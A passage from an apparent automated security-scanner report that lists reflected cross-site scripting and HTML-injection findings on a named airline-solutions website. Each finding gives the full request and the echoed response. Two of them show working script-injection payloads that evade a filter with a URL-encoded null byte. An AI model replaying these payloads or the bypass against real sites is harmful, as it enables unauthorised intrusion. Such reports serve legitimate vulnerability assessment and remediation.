Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:14:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322592; expires=Thu, 06-Oct-2011 10:14:30 GMT; path=/
Set-Cookie: exp_last_activity=1286378069; expires=Thu, 06-Oct-2011 10:14:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:14:31 GMT
Pragma: no-cache
Content-Length: 2038
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?iframe=true&width=500&height=500ada1d"><a>e10d4d698c6" />
...[SNIP]...

3.82. http://www.sabreairlinesolutions.com/home/includes/form_adi [iframe parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b58"><a>cadaafccb73 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_adi?iframe=true10b58"><a>cadaafccb73&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:08:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322592; expires=Thu, 06-Oct-2011 10:08:30 GMT; path=/
Set-Cookie: exp_last_activity=1286377710; expires=Thu, 06-Oct-2011 10:08:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:08:32 GMT
Pragma: no-cache
Content-Length: 2038
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?iframe=true10b58"><a>cadaafccb73&width=500&height=500" />
...[SNIP]...

3.83. http://www.sabreairlinesolutions.com/home/includes/form_adi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5014"><script>alert(1)</script>0d3bc32002f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5014"><script>alert(1)</script>0d3bc32002f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_adi?%00b5014"><script>alert(1)</script>0d3bc32002f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:23:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:23:48 GMT; path=/
Set-Cookie: exp_last_activity=1286378627; expires=Thu, 06-Oct-2011 10:23:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:23:48 GMT
Pragma: no-cache
Content-Length: 2033
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?%00b5014"><script>alert(1)</script>0d3bc32002f=1" />
...[SNIP]...

3.84. http://www.sabreairlinesolutions.com/home/includes/form_adi [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658b6"><a>f616cacc2b9 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_adi?iframe=true&width=500658b6"><a>f616cacc2b9&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:10:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322592; expires=Thu, 06-Oct-2011 10:10:01 GMT; path=/
Set-Cookie: exp_last_activity=1286377800; expires=Thu, 06-Oct-2011 10:10:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:10:01 GMT
Pragma: no-cache
Content-Length: 2038
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?iframe=true&width=500658b6"><a>f616cacc2b9&height=500" />
...[SNIP]...

3.85. http://www.sabreairlinesolutions.com/home/includes/form_demo [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7e1"><a>30ed8f77953 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_demo?iframe=true&width=500&height=500eb7e1"><a>30ed8f77953 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:10:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:10:13 GMT; path=/
Set-Cookie: exp_last_activity=1286377813; expires=Thu, 06-Oct-2011 10:10:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:10:13 GMT
Pragma: no-cache
Content-Length: 2269
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?iframe=true&width=500&height=500eb7e1"><a>30ed8f77953" />
...[SNIP]...

3.86. http://www.sabreairlinesolutions.com/home/includes/form_demo [iframe parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee410"><a>29ae69a2159 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_demo?iframe=trueee410"><a>29ae69a2159&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:03:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:04:01 GMT; path=/
Set-Cookie: exp_last_activity=1286377441; expires=Thu, 06-Oct-2011 10:04:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:04:01 GMT
Pragma: no-cache
Content-Length: 2269
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?iframe=trueee410"><a>29ae69a2159&width=500&height=500" />
...[SNIP]...

3.87. http://www.sabreairlinesolutions.com/home/includes/form_demo [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080885"><script>alert(1)</script>abc23bad94c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80885"><script>alert(1)</script>abc23bad94c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_demo?%0080885"><script>alert(1)</script>abc23bad94c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322635; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322635; expires=Thu, 06-Oct-2011 10:19:29 GMT; path=/
Set-Cookie: exp_last_activity=1286378369; expires=Thu, 06-Oct-2011 10:19:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:19:29 GMT
Pragma: no-cache
Content-Length: 2264
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?%0080885"><script>alert(1)</script>abc23bad94c=1" />
...[SNIP]...

3.88. http://www.sabreairlinesolutions.com/home/includes/form_demo [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab88"><a>1c96e65d21 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_demo?iframe=true&width=5007ab88"><a>1c96e65d21&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:06:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:06:30 GMT; path=/
Set-Cookie: exp_last_activity=1286377590; expires=Thu, 06-Oct-2011 10:06:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:06:31 GMT
Pragma: no-cache
Content-Length: 2268
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?iframe=true&width=5007ab88"><a>1c96e65d21&height=500" />
...[SNIP]...

3.89. http://www.sabreairlinesolutions.com/home/includes/form_issues [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646a"><a>cdfa7ce7308 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500f646a"><a>cdfa7ce7308 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:06:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 10:06:55 GMT; path=/
Set-Cookie: exp_last_activity=1286377615; expires=Thu, 06-Oct-2011 10:06:55 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:06:56 GMT
Pragma: no-cache
Content-Length: 2151
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500f646a"><a>cdfa7ce7308" />
...[SNIP]...

3.90. http://www.sabreairlinesolutions.com/home/includes/form_issues [iframe parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6401"><a>928de2f5074 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

